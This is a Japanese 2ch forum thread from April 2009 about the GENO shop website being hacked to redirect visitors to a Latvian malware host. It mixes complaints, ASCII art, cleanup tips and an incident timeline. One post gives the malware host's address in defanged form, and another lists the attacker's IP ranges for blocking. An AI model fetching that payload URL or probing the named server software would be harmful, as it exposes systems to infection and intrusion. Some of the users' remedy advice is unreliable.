　　　　　　　　　　　　　　ＮＯＤ３２　最強　伝説




　

>>508
いやあれウイルスじゃなくてサーバに侵入されて遠隔操作でやられてる。

泣き寝入りなのか

そしてもう既にハックされている罠ｗ

>>501
４日だな
つか>>1

juicy rockといいgenoといい、信用商売って建前なんだろうけど
ちゃんとしたこと言わないのは腹立つな

4日と7日に進入されたってあるしな

　　　　　　　　　　　　　　　　　　　　　 ､､ 、　　　　　 　 　 　 |｀｀ヽ
　　　　　　　　　　　　　　　　　　　　　　r'' ､＞.､..-‐…‐―-....|i 　 ﾊ
　　　　　　 |　　　 　 　 　 　 　 |　　　　ヽ　 >''. : :ｘｉ ﾄ､: : : : : ｀ヽ__ｉ||
　　　　　　│　　 ヽ／ ``　　　 !　　　　/.∨. .:.:.:,'　!!　 ∨ :-=ﾆ二ﾊ　　　 ヽ／ ``
　　　　　　│　　　 !＿　　　　　',　　　/ﾆ/= .://　 i|　　 ヽ__: : : : :!::.　　 　 !＿
　　　　　　 |　　　　　　　　　　　 〉　　,'.:.:/ .:.:.::/´　 {　　　 ﾘ: ｀: : :.:!:.i　
　　　　　　 |　　　‐┼┐ヽ　　　/　_Ｎ､i.::/! .::::/!　　　ヽ　　　 ∨ﾊ.:.:!i:|　　 ‐┼┐ヽ
　　　 　 　 |.　　　 │亅　　 　 |　 〉　|:/ ! .:.ｲ　'⌒　,　　 ⌒ヽ ヽﾊﾉﾘ!:!ｉ7 　 　 │亅
　　　　 　 /　　　　　　　　　　 |　 ヽ {′! :::i〉,,,　　 ＿＿_　,,, 　从ﾉﾉ::::::i!:|
　　　　　 '⌒ヽ　　　 |　　　 　 |　　/ヾノﾊ:八　　　 ∨:::Yﾉ　　 .ｲ爪ﾘ:! 　 　　|
　　　　　　　　| 　 　 |　　　 　 | 　 !／ヽ:.:.:.:.ﾞ｀}:ト...　｀　 　.. ィ:{:i:!ﾊ,′　 　　│
　　　 　 　 　 |　　　　 　 　 　 | 　 　 　 ヽ:.:.:.:.:ﾉハｒ‐ｒﾄ､ ..ィﾄ.、:!:ﾉ ,′
　　　　　 　 │　 　 /　　　　　|　　　　　 丶. .::´:::::i::::∨ﾊ∨:::ｰ‐ﾄ､　 　 　 　 /
　 　 　 　 　 |　　　/ヘノ　　　 !　　　　　　丶:.:|:.:.:＼「:.7／.:.:.:/　　 ,ｨ 　　　/へノ
　　　　　　　| 　 　 　 　　　　　',　 　 　 　 　 ヽ!:.:.:.:.:.ヽ':.:.:.:.:.:/　,ィ´│
　　 　 　 　 |　,ﾍ　/⌒ヽ　 /⌒丶　 　 　 　 　 |:.:.:.:.:.:.ﾄi:.:.:.:.:/／:.:i　 |　/⌒ヽ
　　 　 　 　 |/　 !/ 　 　 Ｖ　　 　 　 　 　 　 　 |:.:.:.:.:.:.|:ｌ:.:.:.:.'´:.:.:.:.|　 |/　　 　 ＼
　　　　　　 　 　 ′　　　　　　 　 　 　 　 　 　 |:.:.:.:.:.:.|:.!:.:.:.:.:.:.:.:,イ　 ′
　　　　　　　　　　　　　　　　　　　　　　　　　　`┬-､;,;,:. ri¬Tヽヽ

全力でいくか？

geno側が何言ってるのかわかんね、つーか完全になめてるだろ

Avast更新きたけどLa.exeは反応しないね

で、やっぱりまだやばいの？
踏む気にならんのだが

去年から踏み台にされてプロクシ立てられたりしてたのに
個人情報流出が無いとは厚顔無恥も甚だしい

　　　 　 　 　 ＿＿＿_
　　　　　　　:／ﾉし　　　＼::　　　　　　　　　＿＿_
　　　　　 :／　⌒　　　u;　 ＼::　　　　　　／―　　＼
　　　　:／ 　 、 　　　　　　　 ＼:　　　 ／ (●)　 ＼ ヽ
　　　　:|　　　＾　　　　　　　　　 |:　　／（⌒　　 (●)　| 殴るの？
　　　　 ＼　;j　　　　　　　　　／: 　 |　　￣ヽ__）　　　|　２ｃｈで話し合うけど？
　　　　/⌒　ﾟ　　　　　　　　(´ 　 　 ヽ　　　　　　　 ／
　　　 /　　ﾟ　　　〜､　　　　,⌒＼　　ni777　　　 ／
　　　/　j(,　　　　　r　 　　　、ﾟ　 ＼ /　.ﾉ　　　 `＼
　　 /　　　　　　　　　　　　　ゝ　　 jヽ /　　　　 i 　|
　　/　:j　　　　 ﾟ　　　　　　　|　＼　　/　 　　 　.i　 |　　　　　　　　
　　|　　　　　　　　　　　　　　|: 　 ＼/|　　　　　 | 　|　　　　　　
　　|　　ﾟ　　　　　　　 　 :j　　|:　　 　　|　　　 　 u＿)

まて、このお詫びも
凄腕ハッカーが書いたのではないか。

何やってんだよAvast死ねッ

>>444
フー、安心した
さすがGENOcideだぜ！

流石は2万の福箱にリース落ちジャンクノートを入れたGENOさん
超パネェ。カッケーっす

>>508,515
という事はラトビア以外に飛ばしてそこで感染させる事も可能ということか

>>515
リモート操作される脆弱性が突かれてるんだっけ。
それでこれまで散々漏れ串として使われたり、今回の問題が起こったって訳なんでしょ？

つまり、サーバをハックされたがWebページを改編されただけでサーバ自体にウイルスが仕掛けられたわけではない
改変されたページから外部のウイルスサイトに飛ばされたPCには感染しているかもしれないが、それには触れない
とりあえずキャッシュ消せば新たにウイルスサイトに飛ばされることはないと

こういうことか
でもハックされたんだから顧客情報も危ないと思うが

ラトビアって国のラトビアか？

だとしたらなんでだろう

>>528
！？

　　　　　　　　　 　 ＿＿＿
　　　　　　　　　 .／　　　　＼
　　　　　　　　　 .|　^　　　^　|
　　　　　　　　　 | .>ﾉ(､_, )ヽ､.|
　　　　　　　　　__! ! -=ﾆ=-　ﾉ!_
　　　　 　 .|￣￣￣￣￣￣￣￣￣￣￣￣￣|
　　　,. -‐ '|　　　　　　　　　　　　　 　 　 　 　 |
　　/ :::::::::::|　　 　あまり　　　　　　　 　 　 　 |＿_
　 / :::::::::::::| 　 　　　　　　　　　　　　　　　 ｒﾆ-─｀､
. / : :::::::::::::|　　 　　　　　　　　　　私を　　｀┬─‐ .j
〈:::::::::,-─┴-､　　　　　　　　　　　　　　　 　 |二ﾆ ｲ
. | ::/ .-─┬⊃　　　　　　　 　　　　　　　　　|`iー"|
.ﾚ ﾍ.　 .ﾆﾆ|＿＿＿＿＿＿＿＿＿＿＿＿＿|ｒー''"|
〈 :::::＼＿ﾉ::::::::::::::::::::::::::::::::::::::::::::::::::::::: |:::::::: ／::::::::::::|
　　　　　　　　　　　　　　＿
　　 　 　 　 　 　 　 　 ／　 ＼
　　　　　　　　　　　／ 　 ﾉ( 　＼
　　　　　　　　　　　|　^　⌒　^　| 　　
　　　　　　　　　　　| .>ﾉ(､_, )ヽ､.| 　　　＜怒らせない方がいい
　　　　　　　　 　 　 ! ! -=ﾆ=-　ﾉ!
　　 |￣￣￣〉,ァ''"　＼｀ﾆﾆ´／ﾞア´￣｀/￣￣￣￣|
　　 |　　　　 ｀ｒ´､、__ l ! ｨ彡,ｬｧ'"　,,..,,、＼　　　　　|
　,-┴-､　あ〈.,, ｀`''ヽ,,,　 ''"´　　 ﾞ''ヾﾐ,r/.く 　　　　|＿_
/ .-┬⊃　　<　　　 ,;,, ;;; ,,;;　　　　　　 ,fr::<,　　　ｒﾆ-─｀､
!　;;ﾆ|　　　　/　　　 ';;;;;;;;;;;'　　　　　　,!;V:.:ﾉ 　 　 ｀┬─‐ j
＼＿|　　 　<　　　　':;;;;;:'　　　 　 ,;;/;;:.:/:〈 私を　　　|二ﾆ ﾉ
　　　|　　　 <　　　　人＿＿,,,;;;;;ノ/N/:/:.<　　　　　|`ー"
　　　|＿＿／:ト-―ﾃ" ⌒ `ヾj　::;;;;}/:.:.:∠＿＿＿_|
　　　　　　　　l　　　'　-:十:‐' ﾞl,　 〃:.:.:/:.リ 　　　　　ビリィィィ
　　　　　　　　l　　　ｔ,,__,災＿,ﾉl　 f:.ﾘ:.:./:.j

で、TOP以外も感染しなくなったのか？

>>503

やっぱり、そうとれるよな

>>512
ＪＳが旧ってことはＪＣになったか

>>528
な、なんだってー

感染した人は訴えていいぞｗ

GENO復活ワハハハッハハハッハハハ！！！！

>尚、サーバーのウィルス感染や個人情報の流失はございません。

修正した数時間後にまた仕込まれるぐらい好き勝手やられてたのにｗ
信用できるかよｗｗ

http://www.geno.co.jp/4D/webshop/IE7.jpg
AVGとノートンダブルですか

ウチは外に飛ばされる書き換えだけされて、そっから先のセキュリティはしらねーよってこと？

電話とかした奴いねーの？

おいどういうことだよ
二時間前に開いた火スペのオンラインスキャン始まってすらいねーぞ
重すぎなんだよハゲ

>>528
おまい、頭いいなｗ

>>545
だめだこりゃ

GENOは今回のイベントで愛用者が増えましたなぁ

右下のゼロの意味がわからん
ゼロからやり直します？
謝罪の意思ゼロ？
>>446？

明日は祭りかな・・・

こうなると予想したけどパクられたかな

7 名前： ムラサキハナナ(アラバマ州)[sage] 投稿日：2009/04/07(火) 11:15:34.84 ID:VjYRIe8b
当社ではウイルスを配布した実績はございません。
ただし特定のURLに自動的に接続するコードは時々ではありますが埋め込んである場合があります。
なお、これはサーバーの仕様となります。自動的に接続する先のファイルは直接悪さをするわけではなく、
どこか他への誘導があるようですが、別の場所の事なので当社の責任管理下にありませんので
当社では詳細はわかりません。ご了承くださいませ。

>>548
何言ってるか分からん
日本語で書き込め

よくわからんがgeno復活オメ

俺今日からウィルスのことを旧プログラムと呼ぶことにしたよw

対処法記載した
http://ja.uncyclopedia.info/wiki/GENO%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9

>>545
ふいたｗ

おれはゲノの対応に本気で怒っている
絶対にゆるさんぞ
おまえら全力で抗議しろ

GENOが安全宣言したからもうウイルスチェックしなくていいや

安心、だ、よね…

>>545が怖くて見れない

>>557
じゃあ新ってなんだよｗｗｗ

>548

お前みたいのが殺到してるからだろ

ハックされたんなら下手なウイルスよりタチが悪い

やっぱり利用者の情報が抜かれたりしてるんだろうな〜
GENO利用した事ある人達(-∧-；)　ﾅﾑﾅﾑ

>>545
AVGちゃんと商用のライセンスとってんのかな?

nortonのDaily Intelligent Updaterを食わせて実行したらキャッシュ内の.jsは退治できたんだがどうなんだろう。
つか同じころにアマゾンのジョーシンの決済で使った俺のクレカは無事ですか？

ウイルスのことも書けばよかったのに…

旧じゃなくて1日プログラムだったのかも知れん

これにて一見楽着

こわくてgeno踏めねぇえ

>>570
と、思わせといて再開！

>>552
？？

二度と行くかこんな糞サイト



存在すら知らなかったが

enjoy! Digital Life




だってお！（AA略

>>554
あぁ、これは間違いなくパクられてるなｗ

これで一段とメジャーになった　これから目が離せないゾナ

http://internet.watch.impress.co.jp/cda/news/2009/04/07/23057.html
＞ページの改ざんやウイルス感染の危険性などについては、現時点では確認できていないという。
管理能力なさすぎ。
これはマザーズ上場しても　すぐにファーザーズレベル

>>437
. .: : : : : : : : :: :::: :: :: : :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
　　　　. . : : : :: : : :: : ::: :: : :::: :: ::: ::: ::::::::::::::::::::::::::::::::::::::
　　　.　. .... ..: : :: :: ::: :::::: :::::::::::: : :::::::::::::::::::::::::::::::::::::::::::::
　　　　　　　 Λ＿Λ . . . .: : : ::: : :: ::::::::: :::::::::::::::::::::::::::::
　　　　　 　/:彡ミ゛ヽ;）ー､　. . .: : : :::::: :::::::::::::::::::::::::::::::::
　　　　　 / :::/:: ヽ、ヽ、 ::i . .:: :.: ::: . :::::::::::::::::::::::::::::::::::::::
　　 　　 / :::/;;: 　 ヽ　ヽ ::ｌ　. :. :. .:: : :: :: :::::::: : ::::::::::::::::::
￣￣￣（_,ノ ￣￣￣ヽ､_ノ￣￣￣￣

こりゃジェノサイドやで(　´∀｀)ｂ

>>518
>４日だな
つか>>1

いや、確かに>>1は4日になってんだけど。
4月4日にスレができて、そのときは3日に踏んだけどそれから調子悪いって言ってたやつがちらほらいと思うんだ。
で、結局アウトセーフの境目はいつなんだ？ってなってた。

こいつらいつ仕込まれたかも把握できないのか？と思ってさ。

勇気出してトップ踏んでみたらお詫びが見当たらない

>>578
ある意味どれだけ早く管理ポスト送りになるかを見てみたい気がするｗ

上場の日も近い

もはや笑いがこみ上げてきたｗｗｗｗｗ

糞だろ、糞もいいところだろgenoさんよおおおおお

>>545
AVGとノートン先生ｗｗｗ
こりゃ駄目だｗ

ジェノに踊らされて右往左往してる奴も大変だな、ジェノサイドダンサーズ

　　　　　　　　　　　　 ∧..∧
　　　　　　　　　　　. (´･ω･｀)　　これがほんとの
　　　　　　　　　　 cく_>ｙｃく__）　　　　　じぇのさいど
　　　　　　　　　　　（___,,_,,___,,_）　 ∬
　　　　　　　　　　彡※※※※ミ　旦
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　＼　どっ！！ 　／　　　＼　ワハハ！　／
　 　　　＼　　　　　／　　　　　　＼　　　　∞
　l||||||||||||||　∩,,∩　∩,,∩　　∩,,∩　ﾐ∩ハ∩彡
　（,　 　　）（,,　　　 ） 　　　,,）（　　　　）（　　　　）

>>583
丸石サイクルにチャレンジ！

こんな時に限って仮想OSの調子が悪い・・・・・

迅速且つ正確・適切な対応には感服した

期待を裏切らない姿勢が大変すばらしいw

お詫びまだぁ？

お詫びはＴＯＰの上ちょい下あたりに
今回のサーバートラブルについてのお詫び
と小さなリンクがある
まあ、わかりずらいんですけどね

客のPCはどうでもいいんですね

サーバー・・・・トラブル・・・・


　　　？！

>>256-267
レスくれた人ありがとう

ウィルスバスタ最新版（パターン5.949.00）での検知でしたが
どうやら誤検知のようです。

http://www.virustotal.com/jp/analisis/43eb74ec2421691d1e80b9ed4d3cefdb

何かPC重いから再起動したいんだけど
ブルースクリーンで再起不可のウイルスの可能性もあんの？
重すぎてスキャン出来ねーしどうすりゃいいんだよ

ウイルスに感染したらGENOで新しいPC買ったらいいじゃないの

たいがーッッ　じぇのサイドッ！！！！

>>598
キャッシュを消せ

>>593
お詫び？
ウチが悪いんじゃなくてリンク先が悪さしたのになんでウチがお詫びしなきゃならないのさ？？？
変な言いがかりつける様なら訴えるよ君！！

とか思ってたりしてｗｗｗ

>>594
ホントだ
マジでわかりずれぇ
トップがこのお詫び文かと思ったのに・・・

>>601
さすがジェノさん！俺たちに（ｒｙ

これ外部サイトに飛ばされるようになってただけですって言ってるけど
ウイルスが外部サイトにあるかGENOSIDEにあるかだけの違いだろ。　どっちでも同じだっちゅーの。

キャッシュ即消しでなんでも解決できるんだな

>>598
うん、ウイルス配布元がキャッシュ消すだけでいいらしいよ
バックドアなんてないらしいよ

今アクセスしても平気？

今からIE起動するが

>>598
なんでID変わってないの？

＞＞５９９
感染済みのＰＣを買うんですね

>>608
IEはよせ

よっしゃ、キャッシュを消すか
これで俺も安全だな
netstat？何それうまいの？

>>598
絶対に再起動するなよ
したら終わる

>>611
firefox　画像もオフにしてんだよ

Antivirﾀｿ対応した？

NoScript最強すぎるだろ

僕達の冒険はこれからだ！

GENO先生の次回作にご期待ください。

>>610
いいえGENOに侵入できるPCでつ

>>618
スーパーハカー御用達ＰＣか　　すげぇーー！！

まだまだスレは地味に続きそうだな

諦めて集団告訴と行こうか。

>>615
した

やっぱGENOのアウトレットはWordPress ME2.0.10つこうてるらしい。
わくわくさせるぜ。

GENOSIDEにウイルスはありませんでした

GENOSIDEにウイルスはありませんでした

GENOSIDEにウイルスはありませんでした

>>620
この調子だとニュース議論送りになっても延々と続きそうだと思うｗ

2ちゃん史上最大の祭りになるとはこのとき誰も

おいおいウイルス対策ソフト死亡したのもブラウザのキャッシュ消せば直ってたのかよ
リカバリの意味なかったぜ

亜種とかありそうだしOpera使うか・・・

他のサイトも感染してる可能性あるんでしょ？
これからもこういう事がおこる度にｼﾞｪﾉｻｲﾄﾞって言われるだろうな

で、genoにもうアクセスしてもいいでしか？

>>626
なに　まだ　つづきあるのかよ

＞＞６３０
いいんでしょ
ＧＥＮＯが安全宣言してるんだし

また、明日当たり改ざんされるんじゃね？
もしそうなったら、本気で笑うがｗｗ

>>629
genoと同じ鯖環境で動いているサイトだともちろん同じ脆弱性を突かれて
ウィルスを撒き散らす可能性があるよ。

GENOの戯言とは思ったがIEのキャッシュ消してみた

案の定IEとノートン先生が落ちた、当たり前だが全く効果なし

さぁーてじゃあ、努力の結晶
GENO鯖にあら探しするか

次の改竄がいつ頃になるか予想するスレになるだけ、24時間以内だろうけどｗ

ラトビアを禁止にしただけなら改ざんされるだろうね〜

>>637
むしろ今してくれｗ

おそらく、警察にも通報してないんだろうな。

新聞広告出した日とかに狙われたら
マジで感染者やばいことになりそう

なんなのこのクソ対応は

どうすりゃ向こうは素直に謝るのかね？

この騒動もう普通に終わりそうだな

やっと安全に買い物できるようになって良かった
記念に何かポチろうかな

>>640
警察どころか、恐らくIPAの岡ちゃんにも話を通していないと思うｗ

ＩＥ６で一通りみたけど
大丈夫っぼいね、ただし※

これで終わったと思うなよ
光ある所に影が出来るように
GENOある限りGENOウイルスは何度でも蘇る！！＞＜

みんなおつかれｗ

>>634
genocide怖いよー

そうか俺のWindowsスタートボタンがちかちかしてんのもこれのせいか･･･

1万9千円で19万のPC売った丸紅とは真逆の対応だ。　誠意のかけらも感じないｗ　保身いのち！　

アバストたんはゴメンなさいしないといけないね
ゴメンなさいのAAくらはい

会社ｸﾋﾞになった人も出たというのに・・・（自業自得だが）

www.geno.co.jp/

こっちには謝罪すらないんだな

ウイルス踏んだ人たちが被害届け出せばいいんじゃないの？
偽装貼ったやつらも一緒に
件数多ければニュースもでかくなるよ

みんな短い間でしたがお世話になりました

>>594
許せない
もう絶対に許さないぞ

このウィルスネタが起きるまで知らなかったショップだが
こんなに話題になってるって事は何気に有名な所だったのか？
自作パーツ激安売りとかそんなんか？

>>637
AM6:00頃と予想

とりあえず感染した奴は文句のメール撃てばいいのか？
なんかこのまま無かったことになるのが一番腹立つな

まず鯖トラブルってところからして間違いだし、完全に隠蔽モードに突入ｗ

なんだか心が晴れ渡るようだ　これで新しい未来（明日とかいてみらいとよむ）にむかって歩き出せるな

北朝鮮、迷惑巨大打ち上げ花火、テポドン3号を地球全域へ大公開
http://www.nicovideo.jp/watch/sm6684677

北朝鮮、迷惑巨大打ち上げ花火、テポドン3号を地球全域へ大公開
http://www.nicovideo.jp/watch/sm6684677

北朝鮮、迷惑巨大打ち上げ花火、テポドン3号を地球全域へ大公開
http://www.nicovideo.jp/watch/sm6684677

北朝鮮、迷惑巨大打ち上げ花火、テポドン3号を地球全域へ大公開
http://www.nicovideo.jp/watch/sm6684677

>>654
天才現る

微妙なサイトの重さといい
画面の表示もっさり感といい
直ってないかも感がして、スリル満点すぎる

587 ：名無しさん ：sage ：2009/04/08(水) 00:20:23 0
別にgenoは悪くないのに何でこんなに粘着行為してんの
営業妨害じゃねーの

サイトに行きたくないから連絡先が分からないんじゃね

ラトビアに行ったらおみやげたくさんくれた
http://www.dotup.org/uploda/www.dotup.org29313.jpg

また深夜にハックされて明日お祭りですねw

ハッカーがjsじゃなくscriptタグを直接埋め込んでたらjs offにしててもアウトだったな。

どうしてもTop見てみたいって奴は、

VirtualPC2007SP1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=28c97d22-6eb8-4a09-a7f7-f6c7a1f000b5
をDLしてインストール。
↓
http://www.microsoft.com/downloads/en/results.aspx?freetext=VHD&displaylang=en&stype=s_basic
の中から、好きな仮想マシンイメージDLして、VirtualPCで読み込む。
英語版が殆どだけど、Web見る分には問題なく使えるはず。

これ使って見とけ。

いい加減にしろ
もう二度と買わねえよ
責任とれよ
くそげの

よく分からんのだけどこういうのって株価とかにもやっぱり影響出るの？

>>659
ttp://www.keishicho.metro.tokyo.jp/haiteku/haiteku/haiteku1.htm
ウイルス被害にあった人はここで相談するといいんじゃないかな

>尚、サーバーのウィルス感染や個人情報の流失はございません。
流失はなかったけど流出はあったとか？

新品】 NEC VersaPro タイプVE [PC-VY20AED7HJW5] （Core2DuoT7250 2.0GHz /1GB /80GB /S-マルチ /Vista Biz or XPP）
[商品番号] GA09077530
[販売価格] 45,990 円
[ポイント] 1
[在庫数] 17

●CPU Core 2 Duo T7250 (2 GHz)
●インストールOS Windows Vista Business with SP1 (Windows XP Professional インストールサービス適用)
●ディスプレイ 15.4型ワイドTFTカラー液晶(WXGA)
●メモリ 1GB(ECC無しDDR2-SDRAM、PC2-5300、1024MB SO-DIMM×1)
●ハードディスク 80GB
●光学ドライブ DVDスーパーマルチドライブ
●バッテリ ニッケル水素バッテリ
●LAN 1000BASE-T/100BASE-TX/10BASE-T
●インストールアプリケーション なし
●再セットアップ媒体 再セットアップ用媒体添付[Windows XP Professional用(CD-ROM)]
でこいつは届くのか？
他はどうでもいいが

>>672
店頭公開していない未公開株なら株価もなにもないよｗ

で今はgenoのサイトは大丈夫なのか？
飛ばされるかもしれない環境で見た人はいるの？

やっと再インスコ完了

ついでにAHCI入れようと思ったんだけどnforceでの入れ方がよくわからん

能力ある奴がトンズラして絶賛暴走中なんだろきっと
ウイルス多重ライセンスの暴露とか、それを裏付けるネタは上がってる。
高見の見物と行きましょうや

>>675
いいなそれ
届いたら3万で俺によこせ

アウトレットのほうも致命的なほど改ざんされていたのに
総スルーとは流石ネ申は違うな

>>668
まぁでもクラッカー側も攻撃対象が対策をしたのなら無理にそこに拘るより
別のモロヨワ性の残ってるサイト狙うんじゃない？

GENOがちゃんした対策とったのかは知らんけど・・・

>>675
35,000!

>>673
いやまあオレは引っかかってないんだけど、
とにかくガン無視決め込もうとしてるgenoが腹立つからなんとかしてやりたい

UAC無効にしたりブラウザを管理者権限で動かさない限りVistaは無問題

>>669
それはどういう仕組みで？

antivir3.vdf 7.1.3.27

これは対応してる？

>>657
そこそこ有名

>>676
そうなのかありがとう
全然分からないんだけどなんかちょっと気になって

>>667
おみあげちょうだい

WIN 10,0,22,87

このバージョンは大丈夫？

今はCore2セットのPCが5万せずに買える時代か
3年前に20万で買ったのにもうポンコツPCだ
もう古いから買い換えたいけどタイミングと、今のPCが使えるから購入までは行かないのが困りもの

>>667
行くだけでお土産くれるとは優しいところだね^^

>>552の意味がまったくわからなかったが
今やっとわかった、なんだこの0は？

>>437
どたまキタ！
なんじゃこれ。むちゃくちゃじゃねーか。
こんな論理許されるのか？

やっぱりまだ落ちるよね？

再起動からの復帰。
何ともねー。

やったぜ、どうやら感染してないようだ。

win2000 リストア済み（リカバリCD無し）をゲノで買った人は
どうやって再インストールすればいいですか？

謝罪大特価を期待している俺

ねえコマンドプロンプロで確認しようと思ったら立ち上がらないんだけど自分だけ？
なんかexeのデータも数個作動しないんだけど。解決はやっぱりリカバリだけ？

ていうか、７日にも侵入されてるのに驚いた
おま、メンテ中にも侵入されるってどんだけ間抜けなんだよ

謝罪特価どころか
2日分の営業停止で損した分
ふっかけてくるんじゃない？

またウイルス復活したら仮想のXPで踏んでうｐする

散々放置した上にこの対応ww

>>699
流石に来ないだろｗ
お詫びとしてIntelの64GBのSLCのSSDを10個タダでくれたら
これから贔屓にしてやっても良いと思ってるｗ

>>700
起動しようとするとタクスバーもない画面に切り替わるけどすぐ元の画面に戻る?

メールでの返答はないぞ

アクセスブロッケン！！！！！！！！！！！！！！！

>>691
(´；ω；`)ブワッ

さすが注文キャンセルのとき、
件名にキャンセルしましたで
本文白紙送りつけてくるところだけある。

キャッシュを消すだけで解決するなら誰も苦労しないわ、ただの証拠隠滅ｗ

>690

つttp://９４．２４７．２．１９５/jquery.js

>>703
仮装PCって構築するのにどのくらい時間かかる？
なんなく長い時間かかりそうで億劫なんだよね・・・

>>708
おまえ競馬板いるだろｗｗｗｗｗｗ

>>706
そうそう。なんかもー今日一日ずっとＰＣいじってどうにかしようとしたんだけど
馬鹿だしＰＣさっぱりわかんないからお手上げ

今度はmixiトップあたりでもれなくラトビアの旅が付いてくると面白いんだが。

>>698
Win2000のインストールＣＤをヤフオクで買う。

＞尚、サーバーのウィルス感染や個人情報の流失はございません。

パソコン一般板でもいわれてるけど
流失はございませんって…。

ファイアーウォールを入れていたけど、防げたかどうかもわからん

　　＼　　　　　　　　 /_　/　　　　　ヽ　/　　　} ﾚ,'　　　　　　　 ／￣￣￣￣＼
　　|｀l｀ヽ　　　　／ヽ／ ＜´｀ヽ u　　∨ u 　i レ'　 　 　 　 　 /
　 └l>￣　　　 !i´-） 　 　 |＼ ｀､　ヽ）,　／>/　　　　　　　　/　 地　 ほ　 こ
　　　!´ヽ､　　 ヽ ( _　U 　 !､　ヽ｡ヽ/,ﾚ,｡7´/-┬―┬―┬./　　獄　 ん　 れ
　　_|＿/;:;:;7ヽ-ヽ、 '') 　""'''｀` ‐'"='-'" / 　　 !　　 ! 　　/　　　だ.　 と　 か
　　 |　 |;:;:;:{　 U u￣||　u　u 　,..､_ ->　/｀i　　　!　　 !　　＼　　　：.　 う　　ら
　　 |　 |;:;:;:;i＼　　　 iヽ、 　 i {++-`7, /|　 i　　　!　　 !　　＜_　 　 　 の　 が
　　__i　ヽ;:;:;ヽ ｀､　　i　　 ヽ、 ￣￣／　=､_i＿　　!　　 !　　 /
　　　ヽ　ヽ;:;:;:＼ ｀ヽ､i　 　／,ゝ_／|　　i　 ￣ヽヽ　!　　! ,, -'＼
　　　　ヽ、＼;:;:;:;:｀ー､｀ｰ'´￣／;:;ノ　 ﾉ　　　　　 ヽ|　／ ,､-''´ ＼／￣￣￣￣
　　　 　 　 　 　 　 　 ￣￣￣　　　　　　　　　　　　Y´／;:;:;＼

VPC入れてるけどVPCのインスコとOSのインスコするだけだから半日もあれば充分かな。
使い方を覚えるのにかかる時間は本人次第。　PCに慣れてれば数分で終わる。

>>437
ウイルス感染を謝らないとか
アホじゃねえのか

>>713
MicroSoftからVirtualPCを無料ダウンロードしてきて、
スレの↑で張られているMS謹製の英語版のXP等の既成イメージをダウンロードして
それを動かすだけ。全部無料。

この場合、構築する手間なんてまったく無いけど、回線がショボいとダウンロードする時間がちょっとかかるってだけ。

仮に仮想イメージを自分で一から構築するにしても普通にPCにOSをインスコするのと手間隙も掛かる時間もほぼ一緒。

普通に買い物に行って感染した奴はマジで可哀想だなｗｗｗ

VPCやってみようかと思ったが回線の速度が酷すぎて諦めた

謝るといろいろと面倒になるので謝りません

>>715>なんかexeのデータも数個作動しないんだけど
Spybot - Search & Destroyとか動かなくて
windowsupdateも失敗するとかか？

インプレスはどう流すのか見物ｗ

impressとlivedoor終わったな

>>725
たかだか数十メガだろうがｗ
とっとと光引きなよ。

再発動したらVirtualBOXで逝ってくる。

>>723
さんくす
ちょっと試してみるよ

>>730
昼やったら7〜20KB/秒しか出なかったのよ

>>715
当方ウインドウズアップデートも起動しない

IEで検索して特定のページは普通にアクセス出来たけど、
別の特定のページは何度クリックしてもIEが強制終了される

火狐やクロムサファリだと問題ない。
自分はいろいろ調べた結果フォーマット以外では無理そう

robocopyで諸々バックアップとれるようにしてた俺涙目

つーか知らずに行ったけどFirefoxが落ちただけで感染してないぞ
XP Pro SP3 +カスペ

コマンドプロンプト開けないやつはcommand試してみれば
ファイル名を指定して実行でcommandって入れてEnter
終わるときは×ボタンつかえないからexitで終わってね

Latvija hs.2.zlkon.lv:94.247.2.195-94.247.2.255
Latvija hs.3.zlkon.lv:94.247.3.195-94.247.3.255

PC設定での遮断方法分らんから、これをNISとPGに入れた

>>734Combofixを試してないなら↓を読んでを試してみてくれ
windowsupdateやSpybotやアンチウイルスが起動不可能にしてくれる
致命的なやつ駆除してくれるが、直らなくても恨むなよ
http://d.hatena.ne.jp/niryo0113/20080317/1205765223

GENO先生の次回作にご期待ください！

>>437
きゃぷって有名どこのうｐろだに貼ってくれ
見に行く気にすらならん

大丈夫なのこの会社？

puppyインスコ中
早くゲノのトップがみたいです

ttp://venus.bbspink.com/test/read.cgi/ascii/1238024920/
ここの>>436と今話題になっているウィルスって同一のもの？

> 尚、サーバーのウィルス感染や個人情報の流失はございません。

りゅうしつ 【流失】
（名）スル洪水などで、流されてなくなること。
「津波で多くの家屋が―した」

ﾜﾛﾀ
「しゅ」が言えない子供かよｗ

>>743
中の人は高卒なんです。あまり触れてあげないでくださいｗ

流失はございません（が流出はしました）

こういうことだろ

>>742
違う
それはトロイ

>>743
流出はあったかもしれないけど流失はありませんでした
っていうことですよｗ

クリーンインストールってば、意外に大掃除的でさ、ひ、久しぶりにきもちいい作業だったぜ・・・

まだ放置なの？

>>738
メールとか先週分のバックアップがMOにあるからフォーマットするんだ決めたんだ

まだしてないけどフォーマットするんだ。だから今はフォーマットするウイルスも怖く無い
この機会にリンク踏みまくるんだ

まとめてみた。訂正頼む

04/04(土)
・PC一般板のGENOスレで「GENOのサイトが改竄されている」との報告が出る。(10:43)
・スレでの報告から、GENOサイトにアクセスするとウィルスに感染する可能性があることが明らかになる。
・ν速にスレが立つ。(20:26)
・改竄されたまま一日を終える。

04/05(日)
・この日の夜から短縮URLによる各板へのウィルス爆撃が本格化。多数の犠牲者が出る。
・セキュリティ板で通販サイト juicyrock.co.jp もGENOと同様の改竄を受けていることが報告される。
・楽天のショップ www.rakuten.ne.jp/gold/i-na/ でGENOウィルスを検出したという話題が出る。
・GENOサイトは完全放置のまま1日が終わる。

04/06(月)
・社員がようやく出社してきたのか、サイトがメンテナンス中になる。(10:00頃)
※ただし「メンテナンス中」に切り替えたのはトップを含む数ページのみで、未だ改竄された商品ページなどにアクセス可能だった。
・価格.comなど価格比較サイトからGENOへのリンクが消える。
・juicyrock.co.jp が403になる。その後復旧、「お詫び」が発表される。
・www.rakuten.ne.jp/gold/i-na/ のページが真っ白に。その後何事もなく再開。
・GENOが再開。「サーバーに一部不具合がございました」(20:20頃)
・再開したものの、未だ改竄されたままであることが報告される。その後しばらくして正常に。

04/07(火)
・GENO、再度改竄される。(8:00頃)
・GENO、再びメンテナンスに。(8:10頃)
・インプレスにGENOウィルス事件についての記事が出る。(15:59)
・GENOが再び再開。「お詫び」を発表。「ウィルス」ではなく「旧プログラム」とのこと。(23:30頃)

